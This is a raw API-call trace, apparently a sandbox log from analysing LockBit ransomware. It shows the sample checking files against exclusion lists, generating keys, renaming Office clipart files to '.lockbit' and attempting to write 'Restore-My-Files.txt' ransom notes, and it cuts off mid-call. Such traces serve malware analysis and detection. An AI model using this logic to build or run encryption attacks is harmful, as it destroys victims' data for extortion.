[0147.868] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.869] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.869] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185798.WMF") returned 1 [0147.870] lstrcmpiW (lpString1="ntldr", lpString2="J0185798.WMF") returned 1 [0147.870] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185798.WMF") returned 1 [0147.870] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185798.WMF") returned -1 [0147.870] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185798.WMF") returned -1 [0147.870] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185798.WMF") returned 1 [0147.870] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185798.WMF") returned -1 [0147.870] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.870] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned=".WMF" [0147.870] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.870] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.870] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.871] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.871] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF.lockbit") returned 72 [0147.872] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185798.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.873] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.873] malloc (_Size=0x40068) returned 0x3df0008 [0147.873] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33824) returned 1 [0147.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.873] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.874] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.880] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.880] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.885] free (_Block=0x1fa2ed8) [0147.885] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.885] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.885] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5eae, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185800.WMF", cAlternateFileName="")) returned 1 [0147.885] lstrcmpiW (lpString1=".", lpString2="J0185800.WMF") returned -1 [0147.885] lstrcmpiW (lpString1="..", lpString2="J0185800.WMF") returned -1 [0147.885] PathFindExtensionW (pszPath="J0185800.WMF") returned=".WMF" [0147.885] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.885] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.885] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.885] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.885] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.885] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.886] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.886] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.887] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185800.WMF") returned 1 [0147.887] lstrcmpiW (lpString1="ntldr", lpString2="J0185800.WMF") returned 1 [0147.887] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185800.WMF") returned 1 [0147.887] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185800.WMF") returned -1 [0147.887] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185800.WMF") returned -1 [0147.887] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185800.WMF") returned 1 [0147.887] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185800.WMF") returned -1 [0147.887] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.887] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned=".WMF" [0147.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.888] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.889] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.889] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF.lockbit") returned 72 [0147.889] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185800.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.891] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.891] malloc (_Size=0x40068) returned 0x3df0008 [0147.891] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24238) returned 1 [0147.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.892] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.897] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.897] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.897] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0147.898] free (_Block=0x1fa2ed8) [0147.898] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.898] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.899] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x773a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185806.WMF", cAlternateFileName="")) returned 1 [0147.899] lstrcmpiW (lpString1=".", lpString2="J0185806.WMF") returned -1 [0147.899] lstrcmpiW (lpString1="..", lpString2="J0185806.WMF") returned -1 [0147.899] PathFindExtensionW (pszPath="J0185806.WMF") returned=".WMF" [0147.899] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.899] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.900] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.900] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185806.WMF") returned 1 [0147.901] lstrcmpiW (lpString1="ntldr", lpString2="J0185806.WMF") returned 1 [0147.901] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185806.WMF") returned 1 [0147.901] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185806.WMF") returned -1 [0147.901] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185806.WMF") returned -1 [0147.901] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185806.WMF") returned 1 [0147.901] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185806.WMF") returned -1 [0147.901] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.901] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned=".WMF" [0147.901] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.901] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.901] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.902] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.902] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF.lockbit") returned 72 [0147.902] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: 